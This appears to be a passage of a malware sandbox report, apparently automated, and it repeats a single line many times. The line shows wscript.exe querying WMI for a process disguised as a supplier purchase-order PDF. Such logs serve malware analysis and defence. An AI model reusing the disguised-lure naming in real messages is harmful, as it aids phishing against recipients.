                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 16-12-2024-Pdf.exe'
